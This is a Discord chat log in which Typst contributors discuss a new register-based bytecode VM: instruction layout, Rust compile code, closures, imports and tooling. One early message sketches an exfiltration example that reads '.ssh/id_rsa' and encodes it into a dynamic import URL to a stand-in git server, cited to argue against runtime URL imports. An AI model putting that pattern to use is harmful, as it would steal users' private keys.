It's also a security concern should we allow some sort of URL imports: #1176122103355953162 message

glossy shore Jan 20, 2024, 3:29 PM

#

And exactly how comemo-able is this bytecode?

glossy shore Jan 20, 2024, 3:30 PM

#

left night perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes ...

cache locality will significantly improve then

glossy shore Jan 20, 2024, 3:32 PM

#

left night By the way, I suspect `import "..": *` is gonna be a pain to implement

Shouldn't all scoping just be resolved at comptime

left night Jan 20, 2024, 3:34 PM

#

glossy shore Shouldn't all scoping just be resolved at comptime

That's only possible if the ".." is known then

glossy shore Jan 20, 2024, 3:41 PM

#

sturdy sequoia Like optimizing without limiting to 32 registers

I think given the different constraints we're under this would make sense, it's not like registers have any real advantage over stack / heap for us

glossy shore Jan 20, 2024, 3:42 PM

#

sturdy sequoia My goal is also (maybe) to have multiple sizes of register pages and depending o...

I think int registers, string registers, array registers etc. could definitely be useful

#

we could also allocate it all at once beforehand

sturdy sequoia Jan 20, 2024, 3:47 PM

#

left night did it grow from 8 bytes to 32 bytes?

yes 😂 Because some instructions contain a span, but it's useless so I plan on removing it

sturdy sequoia Jan 20, 2024, 3:49 PM

#

left night By the way, I suspect `import "..": *` is gonna be a pain to implement

Indeed, I don't know yet how to do it 💀

#

I am thinking of compiling and evaluating on-the-fly and cross my fingers that it's enough

sturdy sequoia Jan 20, 2024, 3:49 PM

#

glossy shore And exactly how comemo-able is this bytecode?

the bytecode is copy, it only contains numbers (pretty much)

sturdy sequoia Jan 20, 2024, 3:50 PM

#

left night That's only possible if the `".."` is known then

ah right, that's indeed an issue, I might just forbid it for the time being

#

for include it's fine because I can just evaluate it at runtime (relying on comemo for fast compilation)

#

but letting import be dynamic is a big no-no

glossy shore Jan 20, 2024, 3:50 PM

#

sturdy sequoia the bytecode is copy, it only contains numbers (pretty much)

But like the execution of it

#

as its linear

sturdy sequoia Jan 20, 2024, 3:51 PM

#

left night It's also a security concern _should_ we allow some sort of URL imports: https:/...

I think that it makes sense to allow things like git repos and stuff like that, but my problem is more that packages might use it, and that's an even bigger no-no

left night Jan 20, 2024, 3:52 PM

#

sturdy sequoia I think that it makes sense to allow things like git repos and stuff like that, ...

but even if you allow a git repo, the URL should be static

#

my problem is that if the URL is dynamic (even if it's a git URL), you can exfiltrate arbitrary data via the URL

glossy shore Jan 20, 2024, 3:53 PM

#

what exactly is the attack vector here?

left night Jan 20, 2024, 3:55 PM

#

glossy shore what exactly is the attack vector here?

let's assume typst is executed in your home dir, so the whole home dir becomes part of the project. Then you let id = read(".ssh/id_rsa"), and call import "my.git.server/" + base64(id).

#

The whole read ssh keys, embed them into the PDF in some invisible way and get the person to send you the PDF is imo not that big of a deal. but this here would be a pretty big attack surface imo.

sturdy sequoia Jan 20, 2024, 3:57 PM

#

Ok, I reduced instructions to 16 bytes

sturdy sequoia Jan 20, 2024, 3:57 PM

#

left night my problem is that if the URL is dynamic (even if it's a git URL), you can exfil...

that's true

sturdy sequoia Jan 20, 2024, 3:57 PM

#

left night The whole read ssh keys, embed them into the PDF in some invisible way and get t...

I still think it's a genuine attack vector and it makes me glad that we have proper path sanitization

#

But indeed, leaking stuff through URLs would be 100x worse

#

I brought it down to 12 bytes

#

and that's bigger than I'd like

#

but it's pretty good

left night Jan 20, 2024, 4:02 PM

#

what do you think of SOA for instructions (struct of arrays)?

sturdy sequoia Jan 20, 2024, 4:07 PM

#

left night what do you think of SOA for instructions (struct of arrays)?

I'm not too sure what you mean by that 🤔

#

I meant to ask for clarifications but then I forgot

#

like just having an array of u8 and decoding instructions on the fly?

left night Jan 20, 2024, 4:09 PM

#

sturdy sequoia I'm not too sure what you mean by that 🤔

https://en.wikipedia.org/wiki/AoS_and_SoA

sturdy sequoia Jan 20, 2024, 4:14 PM

#

left night <https://en.wikipedia.org/wiki/AoS_and_SoA>

yes I know, but I don't understand in the context of instructions

#

Ok, I found the culprit and it's now down to 8 bytes

#

That means that each cache line can contain 8 instructions, I'd argue that's about as good as it gets

left night Jan 20, 2024, 4:20 PM

#

sturdy sequoia yes I know, but I don't understand in the context of instructions

In the context of instructions, I meant that opcodes are a separate array from arg1, from arg2 etc.

#

Since not every instruction has the same structure, it would require some cleverness

#

But 8 bytes is pretty good

sturdy sequoia Jan 20, 2024, 4:31 PM

#

left night But 8 bytes is pretty good

I think so too

#

I kind of want to keep it reasonably simple for when I have to debug it 😂

#

BTW @left night how can I chain two Styles

#

As in, I already have a style and I want to add one more

#

(some cleverness to avoid nested StyledElem)

feral imp Jan 20, 2024, 4:31 PM

#

@atomic violet isn't this stuff more like your speed?

left night Jan 20, 2024, 4:48 PM

#

sturdy sequoia (some cleverness to avoid nested `StyledElem`)

content.styled(..) will do this flattening automatically. it is based on Styles::apply.

sturdy sequoia Jan 20, 2024, 4:51 PM

#

left night `content.styled(..)` will do this flattening automatically. it is based on `Styl...

I mean I do care for one reason: that's the only place where I'm allocating in the vm

#

And I want to keep allocations to the bare minimum if I can avoid it

#

But of course we can revisit it once it actually work

#

Only things missing now are import, include and a few instructions like the ability to store in remote contexts, and the ability to run iterators (for x in y)

#

for which the instructions are there, they're just not implemented

feral imp Jan 20, 2024, 4:55 PM

#

Amazing. Atleast someone is dedicating their weekend to typst. A hero amongst mortals.

sturdy sequoia Jan 20, 2024, 4:55 PM

#

Oh, and destructuring values is not yet implemented either!

feral imp Jan 20, 2024, 4:55 PM

#

I retract my praise then.

atomic violet Jan 20, 2024, 5:10 PM

#

feral imp <@284257720406638594> isn't this stuff more like your speed?

It might be, but I have done dug into typst deep enough to contribute anything at the moment 😭

tight glade Jan 20, 2024, 5:17 PM

#

sturdy sequoia Oh, and destructuring values is not yet implemented either!

That's probably equivalent to elegantly change the meaning of a few Registers 😇

#

Which is hella cute

sturdy sequoia Jan 20, 2024, 5:18 PM

#

I have done it like this:
destructuring takes a pattern, the pattern indicates in which locals to store values

#

pretty rudimentary atm

tight glade Jan 20, 2024, 5:24 PM

#

If the values are already stored somewhere we can just change which register is pointing to it right?

atomic violet Jan 20, 2024, 5:24 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

ackshually, I have a question, what does Join do?

sturdy sequoia Jan 20, 2024, 5:29 PM

#

atomic violet ackshually, I have a question, what does `Join` do?

it joins values into a bigger values

#

it's the joining mechanism in typst

#

like joining multiple pieces of content into one big content

atomic violet Jan 20, 2024, 5:29 PM

#

I guessed that much, but what does it do in the inside? Like create a tree node, or push to a vector of things to join, or ...?

sturdy sequoia Jan 20, 2024, 5:30 PM

#

atomic violet I guessed that much, but what does it do in the inside? Like create a tree node,...

push a vector of things

#

but it has the concept of a context, which is a vector of vector to handle nested joining

atomic violet Jan 20, 2024, 5:31 PM

#

why is it signature so weird then? shouldn't it only have "where to push" and "what to push" arguments? Like lhs += rhs instead of target = lhs + rhs?

sturdy sequoia Jan 20, 2024, 5:31 PM

#

atomic violet why is it signature so weird then? shouldn't it only have "where to push" and "w...

yes, before it didn't have that feature

#

now it would just be Push(capacity), Join(what_to_add), Pop(where_to_store)

#

    /// Push a new join group
    JoinGroup {
        /// The capacity hint of the join group.
        capacity: u16,
    },
    /// Pop a join group
    PopGroup {
        // The register in which to store the result.
        target: Register,
    },
    /// Join two values.
    Join {
        /// The value to add to the join group.
        value: Register,
    },

atomic violet Jan 20, 2024, 5:32 PM

#

ah, i see, that makes more sense

sturdy sequoia Jan 20, 2024, 5:33 PM

#

atomic violet ah, i see, that makes more sense

yes, styles are also just special join groups that carry a style

#

styles = show and set rules

#

I've tried to make things fairly simple and clever

#

but there ends up being quite a few moving parts

#

But I think it's okay

#

Because I'm trying to reuse as much of the existing logic as possible, most notably all of the ops::... like ops::add(rhs, lhs) that already exist in the code base

sturdy sequoia Jan 20, 2024, 6:08 PM

#

@left night do we want to keep this feature:

        if let Some(sink_name) = sink_name {
            if let Some(sink_pos_values) = sink_pos_values {
                remaining_args.items.extend(sink_pos_values);
            }
            vm.define(sink_name, remaining_args);
        }

#

If a sink is unnamed, the other arguments get defined as variables in the scope

#

This feels very error prone?

#

And is basically completely incompatible with my design 😦

glad urchin Jan 20, 2024, 6:24 PM

#

sturdy sequoia <@311948531835469827> do we want to keep this feature: ```rs if let Some...

context: https://github.com/typst/typst/pull/2984

GitHub

Fix unnamed sinks not capturing named args by PgBiel · Pull Request...

Fixes #2983
The problem was a tiny oopsie in the eval::call_closure code, where sink was an Option<Ident<'a>> (it would be Some, and thus the named arg capturing code would execute,...

sturdy sequoia Jan 20, 2024, 6:27 PM

#

glad urchin context: https://github.com/typst/typst/pull/2984

yes, but is there feature useful in any way outside of that bug?

glad urchin Jan 20, 2024, 6:28 PM

#

uh

#

well

#

the idea is that you should be able to take any args without caring about them

#

that's all

sturdy sequoia Jan 20, 2024, 6:28 PM

#

For now I'll just treat .. as "discard everything else"

glad urchin Jan 20, 2024, 6:28 PM

#

yea thats exactly what it is

#

not sure if i understand then

sturdy sequoia Jan 20, 2024, 6:28 PM

#

yes figures, because it defines the variables which is super weird

glad urchin Jan 20, 2024, 6:28 PM

#

what's the issue?

glad urchin Jan 20, 2024, 6:28 PM

#

sturdy sequoia yes figures, because it defines the variables which is super weird

only if it's named though

sturdy sequoia Jan 20, 2024, 6:28 PM

#

ah no

#

okay

#

my bad

#

I had misunderstood the code, it was a bit confusing with the if let Some(..) = .. everywhere 😂

glad urchin Jan 20, 2024, 6:29 PM

#

:p

#

hapepns

sturdy sequoia Jan 20, 2024, 6:29 PM

#

ok, so it's the right way 😄

glad urchin Jan 20, 2024, 6:29 PM

#

but yeah you can just throw it all away

sturdy sequoia Jan 20, 2024, 6:47 PM

#

glad urchin but yeah you can just throw it all away

Sorry to say, but...

#

it's...

#

kind of the point 😄

#

throwing all of the eval code into a volcano 😄

#

😈

#

firemc

tight glade Jan 20, 2024, 7:07 PM

#

Question, when we want to change the evaluation , will we have to work with your new bytecode already or is there some level of abstraction?

Like, is the eval trait still a thing? Does it returns bytecode now?

sturdy sequoia Jan 20, 2024, 7:16 PM

#

tight glade Question, when we want to change the evaluation , will we have to work with your...

Now there is the Compile trait which receives the &mut Compiler as an argument, it must produce all of the instructions (with spans) in there (I will make a nicer functional API once it all works) and return a SourceResult<Register> the Register being where the output of that operation is stored.

#

Note that the output may very well be Register::NONE in which case it means it returns nothing

#

As an example:

#

impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()).into_value(),
        );
        let register = compiler.reg();

        compiler.spans.push(self.span());
        compiler.instructions.push(Instruction::Set { value, register });

        Ok(register)
    }
}

#

Here is how ' in an equation gets compiled

#

later on, I plan on remplacing the manual span and instruction push with:

#

compiler.set(self.span(), value, register);

#

Which I think will be much nicer

#

Same with removing the .into_value() by making const_ take an impl IntoValue instead

#

Which would lead to:

#

impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()),
        );

        let register = compiler.reg();
        compiler.set(self.span(), value, register);
        Ok(register)
    }
}

#

Obviously some stuff like loops are much harder to do, but I plan on creating a nice-ish API for branching as well

#

Now here are the updated items missing:

Destructuring (the instruction exists but is not implemented)
Iteration (the instruction exists but is not implemented)
Import and include of other files

#

This means that I should be able to start compiling simple docs!!!!

sturdy sequoia Jan 20, 2024, 7:47 PM

#

https://tenor.com/view/illumination-asian-man-enlightened-oh-okay-gif-16379366

Tenor

#

#

IT WORKS BABYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

#

I AM SO FREAKING GOOD

#

GODDAMN

#

@left night ferrisWink

sly pecan Jan 20, 2024, 7:54 PM

#

now do your thesis

sturdy sequoia Jan 20, 2024, 7:55 PM

#

sly pecan now do your thesis

can't yet

#

missing modules and closures don't work for some reason

sly pecan Jan 20, 2024, 7:55 PM

#

skill issue

feral imp Jan 20, 2024, 7:58 PM

#

There's still Sunday.

#

It's just so absurd to have a jit for a typesetting language. I just can't fathom this.

#

Not a jit but whatever this is.

sturdy sequoia Jan 20, 2024, 7:59 PM

#

feral imp It's just so absurd to have a jit for a typesetting language. I just can't fatho...

it's not a JIT, it's a bytecode based VM

feral imp Jan 20, 2024, 7:59 PM

#

I know, I know.

#

It's still wild.

sturdy sequoia Jan 20, 2024, 8:20 PM

#

feral imp It's still wild.

if you think of typst more as a jupyter alternative where you can build your visualizations (graphs, etc.) directly in, then I think it makes perfect sense

#

But tomorrow I won't have time to work on it

#

and it'll likely have to wait until next w-e

feral imp Jan 20, 2024, 8:22 PM

#

Another blanket shall be delivered. Good work!

lament fulcrum Jan 20, 2024, 8:23 PM

#

a jit would be fun though

#

and maybe even doable with cranelift as a pure rust dependency

tight glade Jan 20, 2024, 8:54 PM

#

sturdy sequoia Now there is the `Compile` trait which receives the `&mut Compiler` as an argume...

lovely!

tight glade Jan 20, 2024, 8:55 PM

#

sturdy sequoia ```rs compiler.set(self.span(), value, register); ```

nice

tight glade Jan 20, 2024, 8:55 PM

#

sturdy sequoia

niiiiiiiiiiiiice

#

What do you think of naming that compile trait ByteCode instead? (yes I love bikeshedding :p)

sturdy sequoia Jan 20, 2024, 9:00 PM

#

tight glade What do you think of naming that compile trait `ByteCode` instead? (yes I love b...

I actually think we should change the nomenclature in the rest of typst to refer to compiling the document as typeset, compiling the modules as… compiling, and evaluating the code as evaluation

#

I think it overall makes more sense

tight glade Jan 20, 2024, 9:01 PM

#

compiling the module into what? modules? 🤣

left night Jan 20, 2024, 9:06 PM

#

sturdy sequoia I actually think we should change the nomenclature in the rest of typst to refer...

but the CLI command is typst compile. do you want to change that to typst typeset too?

#

and the thing is called the compiler of the Typst typesetting language

sturdy sequoia Jan 20, 2024, 9:11 PM

#

left night but the CLI command is `typst compile`. do you want to change that to `typst typ...

no, change that

#

but the function internally is called typeset

glad urchin Jan 20, 2024, 9:12 PM

#

well yea i guess Compile could be a bit generic perhaps

#

maybe ByteCodeCompile?

#

or VmCompile

sturdy sequoia Jan 20, 2024, 9:12 PM

#

glad urchin maybe `ByteCodeCompile`?

eewww way too long 😂

glad urchin Jan 20, 2024, 9:13 PM

#

yea

#

ByteCode on its own is probably a better idea than ByteCodeCompile

#

though VmCompile doesn't sound that bad either

tight glade Jan 20, 2024, 9:14 PM

#

sturdy sequoia eewww way too long 😂

Come on just ByteCode :p

tight glade Jan 20, 2024, 9:14 PM

#

glad urchin though `VmCompile` doesn't sound that bad either

less cool 😎

sturdy sequoia Jan 20, 2024, 9:14 PM

#

tight glade Come on just ByteCode :p

Compile is really fine :-p

#

Stop bikesheding angryeyes

left night Jan 20, 2024, 9:15 PM

#

sturdy sequoia but the function internally is called `typeset`

but that'd be inconsistent too

sturdy sequoia Jan 20, 2024, 9:15 PM

#

fn typeset(
    world: Tracked<dyn World + '_>,
    tracer: &mut Tracer,
    content: &Content,
) -> SourceResult<Document> {

#

I mean you wrote it 😄

left night Jan 20, 2024, 9:16 PM

#

but it's not the full compilation

#

it's just the post-eval phases

sturdy sequoia Jan 20, 2024, 9:17 PM

#

left night it's just the post-eval phases

well yes

left night Jan 20, 2024, 9:17 PM

#

I thought you wanted to rename the public compile function

sturdy sequoia Jan 20, 2024, 9:17 PM

#

now we have
compile -> eval -> typeset -> export internally

sturdy sequoia Jan 20, 2024, 9:17 PM

#

left night I thought you wanted to rename the public `compile` function

no no I meant internally

left night Jan 20, 2024, 9:18 PM

#

I'm not sure I follow. Would you rename any of the existing functions?

sturdy sequoia Jan 20, 2024, 9:19 PM

#

left night I'm not sure I follow. Would you rename any of the existing functions?

no

#

I am just defending the Compile name for the trait

#

😂

left night Jan 20, 2024, 9:21 PM

#

ah

#

I think it's okay

sturdy sequoia Jan 20, 2024, 9:21 PM

#

Thanks ❤️

left night Jan 20, 2024, 9:22 PM

#

I would probably also have called it that

#

But I guess I also have named both Trace and Tracer which are completely unrelated.

#

on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's check command?

#

because regarding performance I have found that going back to cargo check makes my IDE much more performant.

#

a bit unfortunate that I have to call cargo clippy manually now to ensure that CI will pass

cunning wadi Jan 20, 2024, 9:25 PM

#

are you using auto-save?

left night Jan 20, 2024, 9:26 PM

#

no

#

but it still takes between 5-15s to update diagnostics

#

after save

cunning wadi Jan 20, 2024, 9:26 PM

#

that is a lot

#

much more than on my machine for sure

left night Jan 20, 2024, 9:27 PM

#

which is why I'm actually saving less and more after having done a batch of changes

sturdy sequoia Jan 20, 2024, 9:27 PM

#

left night on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's ...

I think I use check but not sure

left night Jan 20, 2024, 9:27 PM

#

cunning wadi much more than on my machine for sure

did you test in on typst recently?

cunning wadi Jan 20, 2024, 9:27 PM

#

I did not, let me check

left night Jan 20, 2024, 9:28 PM

#

it's a little slower since the two main crates were merged

#

the diagnostics also come step by step. when doing a larger refactor, I can see folder by folder getting red

#

as mentioned before, for me (in VS Code) diagnostics completely disappear when saving and only come back once the new ones are available (even the unchanged ones). which is a bit of a pain.

sly pecan Jan 20, 2024, 9:29 PM

#

left night but the CLI command is `typst compile`. do you want to change that to `typst typ...

typst bikeshed

left night Jan 20, 2024, 9:30 PM

#

typst t shorthand could also mean test I just noticed and, in fact, test is a subword of typeset.

#

for some definition of subword

left night Jan 20, 2024, 9:31 PM

#

cunning wadi that is a lot

I should also add that it differs. if the project has currently many errors, it takes longer, closer to 15s maybe. if it's in a compiling state, closer to 5s.

cunning wadi Jan 20, 2024, 9:33 PM

#

cunning wadi I did not, let me check

it's 2-6s for me

#

and I've been running a program for a few hours now that constantly takes up two threads

#

might just be the processor though

left night Jan 20, 2024, 9:37 PM

#

I must admit that I haven't actually measured. I just know that it feels pretty slow at times. But I think the worst times might have been on battery rather than plugged in.

#

But even though M1 is impressive, your desktop might also just be faster.

cunning wadi Jan 20, 2024, 9:37 PM

#

yeah, it's probably that

#

(after mainly using the work laptop for a while I definitely do notice the improved performance, even when just navigating in the editor)

#

(though that one has got an eighth gen low powered intel processor, so, not exactly the most powerful device on the market)

sly pecan Jan 20, 2024, 9:40 PM

#

The difference between desktop cpu and a laptop one is that the desktop one can operate at max power for an extended period of time

#

Laptop ones cannot for thermal reasons

cunning wadi Jan 20, 2024, 9:40 PM

#

yeah

sturdy sequoia Jan 20, 2024, 9:42 PM

#

sly pecan The difference between desktop cpu and a laptop one is that the desktop one can ...

yes but incremental compilation and autocomplete are very bursty loads

#

so the difference in continuous TDP shouldn't matter that much

feral imp Jan 20, 2024, 9:45 PM

#

when I write pointer-code, unsafe code, clippy is too much anyways, and will fail code that builds/compiles. I'd use cargo check as r-a check command as a standard..

cunning wadi Jan 20, 2024, 9:48 PM

#

that sounds like the unsafe code might be doing things it should not be doing

sturdy sequoia Jan 20, 2024, 11:20 PM

#

I'm happy to say I fixed closures!

#

= Hello, world!

#set text(fill: red)
The lazy fox jumped over the brown dog.

#let call_once(fn) = { (fn)(100) }

#call_once(lorem)

#

This for example can already compile 😉

#

So it's really getting there! 😄

tight glade Jan 20, 2024, 11:24 PM

#

lovely 😄

sturdy sequoia Jan 20, 2024, 11:43 PM

#

Ok, I found a very sneaky bug with register remapping, I'm pretty sure it's correct now 😄

#

(basically I could remap the output register without re-assigning it)

#

Ok so I'm having issues with captured values in closures, I'll try and figure it out tomorrow

sturdy sequoia Jan 21, 2024, 12:00 PM

#

@left night How are # before a value rejected normally? Because from what I can tell it should be at the lexer level? But for some reason it's allowing it in code mode 😐

#

ah no okay I need to extract the errors separately my bad

sturdy sequoia Jan 21, 2024, 12:22 PM

#

I fixed closure scopes and captured values 🎉

#

And now I fixed scopes during eval

sly pecan Jan 21, 2024, 12:39 PM

#

sturdy sequoia I fixed closure scopes and captured values 🎉

Thesis when

sturdy sequoia Jan 21, 2024, 12:43 PM

#

sly pecan Thesis when

soon™️

#

We can now iterate over values 🎉

#

only missing now:

destructuring
modules

glossy shore Jan 21, 2024, 1:10 PM

#

destructuring ought to be easy

sturdy sequoia Jan 21, 2024, 1:11 PM

#

glossy shore destructuring ought to be easy

yes, I just need to adapt the old code 😉

#

modules won't be too hard either imo

#

I have a pretty good idea of how to implement them relatively easily

tight glade Jan 21, 2024, 1:34 PM

#

Doing so good @sturdy sequoia

glossy shore Jan 21, 2024, 1:42 PM

#

sturdy sequoia I have a pretty good idea of how to implement them relatively easily

Without taking runtime imports, I presume

sturdy sequoia Jan 21, 2024, 1:43 PM

#

glossy shore Without taking runtime imports, I presume

Indeed, runtime import just won't be supported

glossy shore Jan 21, 2024, 1:44 PM

#

good.

sturdy sequoia Jan 21, 2024, 1:44 PM

#

glossy shore _good._

Why specifically?

#

I think it's error prone but I'm curious what you think 😉

glossy shore Jan 21, 2024, 1:44 PM

#

yeah mostly error prone

sturdy sequoia Jan 21, 2024, 1:44 PM

#

mind you #include will work the same as before

#

just #import is changing

glossy shore Jan 21, 2024, 1:44 PM

#

mhm

sturdy sequoia Jan 21, 2024, 1:45 PM

#

(for now at least)

glossy shore Jan 21, 2024, 1:45 PM

#

module imports just feel like they should be analogous to Rust use

#

if I write if cond { import "mod.typ"; } what's the scope of the import? Just the conditional?

sturdy sequoia Jan 21, 2024, 1:46 PM

#

glossy shore if I write `if cond { import "mod.typ"; }` what's the scope of the import? Just ...

Right now i'll be just the conditional yeah

glossy shore Jan 21, 2024, 1:48 PM

#

is that already the case?

glad urchin Jan 21, 2024, 1:50 PM

#

sturdy sequoia Indeed, runtime import just won't be supported

Sorry , what does "runtime import" mean here?

#

As in being able to conditionally import?

#

Or being able to provide a "dynamic string" to imports

glossy shore Jan 21, 2024, 1:50 PM

#

dynamic string is what I meant

sturdy sequoia Jan 21, 2024, 1:52 PM

#

glad urchin Or being able to provide a "dynamic string" to imports

dynamic strings

#

you will still be able to conditionally import

sturdy sequoia Jan 21, 2024, 2:37 PM

#

Import and Include are in

#

just destructure left 🎉

feral imp Jan 21, 2024, 2:49 PM

#

If you finish today, and it changes performance by +-20% on thesis, we'll need to go on voice chat and celebrate/rant.....................

sly pecan Jan 21, 2024, 2:50 PM

#

10x slower

sturdy sequoia Jan 21, 2024, 2:53 PM

#

sly pecan 10x slower

💀

#

Stop being mean 😭

sturdy sequoia Jan 21, 2024, 2:53 PM

#

feral imp If you finish today, and it changes performance by +-20% on thesis, we'll need t...

I mean, just destructuring

#

then debugging

#

ferrisForgor

sly pecan Jan 21, 2024, 3:03 PM

#

sturdy sequoia Stop being mean 😭

sturdy sequoia Jan 21, 2024, 3:13 PM

#

Destructuring is in

#

Destructuring works 😎

#

For those wondering, without the doc (there is some but very sparse), the compiler and executors are close to 6k lines long

#

ferrisForgor

#

Poor @left night

#

With the doc and cleanup it'll likely be in the neighborhood of 10k lines

#

😄

#

The first ever document compiled with the new eval

#

Ok so it's very picky about failing to remap registers

#

😐

#

= Hello, world!

#show "Lorem": text(fill: red, "Lo")

#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)

#

This uses too many registers 😂

#

I figured out why

sturdy sequoia Jan 21, 2024, 3:55 PM

#

It's 450 times slower 😂

#

Probably because of compilation lol

#

IT'S FASTER

#

@feral imp @sly pecan IT IS FASTER

#

https://tenor.com/view/evil-laugh-gif-25608698

Tenor

feral imp Jan 21, 2024, 4:01 PM

#

thank god.

sturdy sequoia Jan 21, 2024, 4:01 PM

#

(I had forgotten to memoize closure calls 💀)

feral imp Jan 21, 2024, 4:01 PM

#

we were literarly holding our breath.

sturdy sequoia Jan 21, 2024, 4:02 PM

#

Now onto fix the bug so that I can test it on masterproef 😎

glad urchin Jan 21, 2024, 4:02 PM

#

sturdy sequoia (I had forgotten to memoize closure calls 💀)

imagine running lorem(30) 5 times

feral imp Jan 21, 2024, 4:02 PM

#

sturdy sequoia (I had forgotten to memoize closure calls 💀)

I could have told you to do that 🤣 /s /s /s

glad urchin Jan 21, 2024, 4:02 PM

#

scare away typsters with this simple trick

sturdy sequoia Jan 21, 2024, 4:02 PM

#

glad urchin imagine running `lorem(30)` 5 times

I'm running fibonacci(30)

glad urchin Jan 21, 2024, 4:02 PM

#

wa

#

what didy ou send then

sturdy sequoia Jan 21, 2024, 4:02 PM

#

glad urchin what didy ou send then

oh, a piece of code that didn't compile lol

glad urchin Jan 21, 2024, 4:02 PM

#

ohok

sturdy sequoia Jan 21, 2024, 4:03 PM

#

I think tonight masterproef will compile using the new compiler 😄

lunar kettle Jan 21, 2024, 4:04 PM

#

sturdy sequoia I think tonight masterproef will compile using the new compiler 😄

famous last words

feral imp Jan 21, 2024, 4:05 PM

#

For 10k loc I bet laurmaedje needs it to be a bit fast.

sturdy sequoia Jan 21, 2024, 4:22 PM

#

feral imp For 10k loc I bet laurmaedje needs it to be a bit fast.

I mean it replaces about 3k loc

#

Ok, it's a lot less than I thought

glad urchin Jan 21, 2024, 4:37 PM

#

im more impressed that you did this in like a few days

#

:p

#

i dont have that much free time 😂

sturdy sequoia Jan 21, 2024, 5:32 PM

#

THERE ARE NO MORE todo!()

tight glade Jan 21, 2024, 5:34 PM

#

!!!! ❤️❤️❤️

#

The guy is blazing fast

#

By the thesis!

sturdy sequoia Jan 21, 2024, 5:35 PM

#

I mean there are bugs, I am now fixing the tests 😄

#

Actually most of the failed tests are just slight span differences

feral imp Jan 21, 2024, 5:52 PM

#

waiting intensifies for Goossa; Will typst performance exceed what Man has yet to witness?

low sapphire Jan 21, 2024, 5:53 PM

#

@sturdy sequoia have you already submitted your thesis or is optimizing Typst just part of your procrastination? xD

sturdy sequoia Jan 21, 2024, 5:53 PM

#

low sapphire <@130737672951037952> have you already submitted your thesis or is optimizing Ty...

I got 18/20 on my thesis :-p

low sapphire Jan 21, 2024, 5:53 PM

#

ok haha nice 😄

lunar kettle Jan 21, 2024, 5:59 PM

#

@sturdy sequoia where are the numberssss

#

how much faster/slower on your thesis?

feral imp Jan 21, 2024, 6:02 PM

#

lunar kettle how much faster/slower on your thesis?

We are waaaaiting..

glad urchin Jan 21, 2024, 6:03 PM

#

lunar kettle how much faster/slower on your thesis?

IIUC It can't compile the thesis yet

lunar kettle Jan 21, 2024, 6:03 PM

#

sturdy sequoia I think tonight masterproef will compile using the new compiler 😄

I mean

glad urchin Jan 21, 2024, 6:03 PM

#

But maybe today? :p

lunar kettle Jan 21, 2024, 6:04 PM

#

Dherse stands to his words ~~except when it comes to gradients~~

glad urchin Jan 21, 2024, 6:04 PM

#

Well "tonight" has just started in their timezone I believe

#

So let's give Dherse some time 😂

sly pecan Jan 21, 2024, 6:05 PM

#

sturdy sequoia Actually most of the failed tests are just slight span differences

Shouldn't the output be identical?

sturdy sequoia Jan 21, 2024, 6:22 PM

#

sly pecan Shouldn't the output be identical?

my compiler generally takes bigger spans at the moment

#

but I'll work on improving it!

sly pecan Jan 21, 2024, 7:09 PM

#

sturdy sequoia my compiler generally takes bigger spans at the moment

I don't know what a span is, but good job!

feral imp Jan 21, 2024, 7:25 PM

#

https://tenor.com/view/spam-spamalert-gif-20933994

Tenor

tight glade Jan 21, 2024, 8:53 PM

#

I love seeing everyone so invested in your work Dherse 😁❤️

glossy shore Jan 21, 2024, 9:05 PM

#

it's a good investment

sturdy sequoia Jan 21, 2024, 9:13 PM

#

sly pecan I don't know what a span is, but good job!

A Span is basically an ID to somewhere in the (typst) source

sly pecan Jan 21, 2024, 9:13 PM

#

So what does having bigger spans mean?

sturdy sequoia Jan 21, 2024, 9:13 PM

#

sly pecan So what does having bigger spans mean?

It means it globs more of your code

#

so instead of this it might be this. that gets globbed

#

obviously not great but I plan on improving upon that later

sly pecan Jan 21, 2024, 9:16 PM

#

Does it have consequence for the actual output?

sturdy sequoia Jan 21, 2024, 9:16 PM

#

sly pecan Does it have consequence for the actual output?

no

#

but it might affect preview <-> source click (in the webapp)

#

and it makes most tests fail

sly pecan Jan 21, 2024, 9:16 PM

#

How fast is your thesis?

#

Most important question

sturdy sequoia Jan 21, 2024, 9:17 PM

#

I don't know yet, I am tracking down two bugs that prevent me from compiling it

#

and I took a long break

sturdy sequoia Jan 21, 2024, 9:49 PM

#

Ok so there's still something wrong with scopes

#

and methods will be the death of me

#

they're parsed so... weirdly

feral imp Jan 21, 2024, 9:52 PM

#

time to.. rewrite typst?

low sapphire Jan 21, 2024, 10:10 PM

#

rewrite it in Zig

sturdy sequoia Jan 21, 2024, 10:16 PM

#

https://tenor.com/view/vomit-puke-ugh-gif-25512927

Tenor

sturdy sequoia Jan 21, 2024, 10:45 PM

#

Ok so, doing register optimization S-U-C-K-S

#

I am going for another method of re-using registers

sturdy sequoia Jan 21, 2024, 11:05 PM

#

I'm happy to say that this new method shaved a good 2k lines from the total

west light Jan 21, 2024, 11:18 PM

#

sturdy sequoia Ok so, doing register optimization S-U-C-K-S

I quite like it. I like using https://godbolt.org/ to see how tight my loops are. But it’s probably more useful for micro-controllers. I have no idea what it’s like on big-boy systems.

Compiler Explorer

glad urchin Jan 21, 2024, 11:18 PM

#

west light I quite like it. I like using https://godbolt.org/ to see how tight my loops are...

i think they're talking about registers in their VM

west light Jan 21, 2024, 11:21 PM

#

glad urchin i think they're talking about registers in their VM

Oh boy. … that some new sort of fun. But wouldn’t that technically be cache’d vs register. I suppose it depends on the host system.

sturdy sequoia Jan 21, 2024, 11:24 PM

#

west light Oh boy. … that some new sort of fun. But wouldn’t that technically be cache’d vs...

no no

#

I am building a typst VM for faster eval

#

and it uses registers

#

😂

west light Jan 21, 2024, 11:29 PM

#

sturdy sequoia and it uses registers

So it uses custom instructions and virtual registers…. And you’re working on jit optimization? … mostly guessing. How wide are the registers, how many are used?

cunning wadi Jan 21, 2024, 11:30 PM

#

This does not include a JIT

#

